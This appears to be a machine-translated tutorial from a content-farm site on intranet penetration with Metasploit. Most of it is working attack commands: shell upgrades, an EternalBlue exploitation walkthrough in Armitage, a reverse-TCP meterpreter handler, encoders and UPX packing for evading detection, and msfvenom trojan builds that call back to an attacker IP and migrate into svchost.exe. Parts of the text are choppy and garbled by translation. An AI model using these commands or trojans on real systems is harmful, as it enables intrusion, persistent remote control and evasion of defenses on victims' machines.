

How to solve the problem of intranet penetration

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/03 Report--

This article explains "how to solve the problem of intranet penetration". The methods introduced here are simple, fast and practical. Let the editor walk you through "how to solve the problem of intranet penetration".

1. Several ways to upgrade a session

python -c "import pty;pty.spawn('/bin/bash');"  Upgrades the shell session

sessions -u 4  Upgrades shell session 4 to a meterpreter session

Modify the payload directly. A Trojan whose payload is a shell can also connect.

2. Getting familiar with Armitage

apt-get install armitage  Install Armitage

armitage  Enter the interface

You don't have to go straight in.

Select Quick Query

Enter the address you want to query

The live hosts found by nmap are (1 is the physical computer, 2 is the gateway, 135 is the Linux target, 254 is the broadcast address, 128 is the Win7 target, 129 is the local machine)

Access denied Open Service Manager

with all the vulnerabilities.

Search MS17

move over

The EternalBlue vulnerability is present.

infiltration

Penetration successful

3. How to create a listener handler

handler -H 192.168.1.129 -P 4444 -p windows/meterpreter/reverse_tcp

4. Preventing sessions from hanging

show advanced Display advanced parameter settings

set ExitOnSession false  The port keeps listening after a shell has been received

set SessionCommunicationTimeout 0  Sets the session communication timeout, default 5 minutes

set SessionExpirationTimeout 0  Sets the session expiration timeout, default one week

5. Setting encoding in the console

EnableStageEncoding Whether to allow stage encoding

StageEncoder Sets the encoding to be used

Good encoders: x86/shikata_ga_nai, cmd/powershell_base64

6. upx packing

Packers

upx -9 qq.exe

-1  compress faster          -9  compress better

-d  decompress               -l  list compressed file

-t  test compressed file     -V  display version number

-h  give more help           -L  display software license

Test whether compressed files can run

upx -t qq.exe  OK means it can run


7. msfvenom trojan payload persistence

(The Trojan automatically migrates to svchost.exe when it runs)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.129 lport=4444 PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe


8. msfvenom Trojan encoding

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -e cmd/powershell_base64 -i 14 -f exe -o shell.exe
